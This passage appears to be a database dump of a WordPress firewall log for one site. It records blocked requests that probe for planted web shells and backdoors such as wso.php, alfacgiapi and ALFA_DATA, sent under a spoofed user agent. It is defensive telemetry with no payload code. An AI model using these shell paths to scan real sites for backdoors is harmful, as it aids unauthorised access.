User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11043,1673883194.454166,1673883194.342300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11044,1673883193.255253,1673883193.143800,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11045,1673883192.107669,1673883191.997600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11046,1673883185.623240,1673883185.511300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11047,1673883182.763088,1673883182.645200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11048,1673883181.517225,1673883181.405800,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11049,1673883180.323331,1673883180.208400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11050,1673883176.870583,1673883176.751400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11051,1673883175.706929,1673883175.598900,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11052,1673883172.642666,1673883172.498400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11053,1673883169.891593,1673883169.780400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11054,1673883168.597853,1673883168.487200,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11055,1673883168.008318,1673883167.898600,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11056,1673883166.737023,1673883166.567100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11057,1673883165.734227,1673883165.622400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11058,1673884023.165101,1673884023.029100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11059,1673884019.324642,1673884019.192800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11060,1673884001.649424,1673884001.512500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11061,1673883998.504155,1673883998.359700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11062,1673883991.622664,1673883991.469400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11063,1673883920.682213,1673883920.559800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11064,1673883919.740297,1673883919.625100,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11065,1673883918.716304,1673883918.591100,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11066,1673883917.469248,1673883917.355500,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11067,1673883916.243938,1673883916.130800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11068,1673883915.230620,1673883915.114300,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11069,1673883914.394612,1673883914.267800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11070,1673883913.435859,1673883913.323800,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11071,1673883912.391271,1673883912.252200,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11072,1673883909.945302,1673883909.837000,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11073,1673883908.328934,1673883908.206900,'\0\0\0\0\0\0\0\0\0\0��[�Rs',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11074,1673884129.621774,1673884129.399000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11075,1673884089.684057,1673884089.545600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11076,1673884399.017295,1673884398.903100,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11077,1673884398.262558,1673884398.129500,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11078,1673884397.727202,1673884397.610500,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11079,1673884397.207638,1673884397.091300,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11080,1673884396.561951,1673884396.453000,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11081,1673884396.079575,1673884395.969800,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11082,1673884395.495870,1673884395.385400,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11083,1673884394.925449,1673884394.793400,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11084,1673884394.252608,1673884394.118800,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11085,1673884393.713635,1673884393.605100,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11086,1673884393.165816,1673884393.044500,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11087,1673884392.609918,1673884392.496300,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11088,1673884392.090677,1673884391.983600,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11089,1673884391.551905,1673884391.432500,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11090,1673884390.581905,1673884390.462900,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11091,1673884390.096807,1673884389.982000,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11092,1673884389.645429,1673884389.530200,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11093,1673884387.993759,1673884387.882200,'\0\0\0\0\0\0\0\0\0\0��-���',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 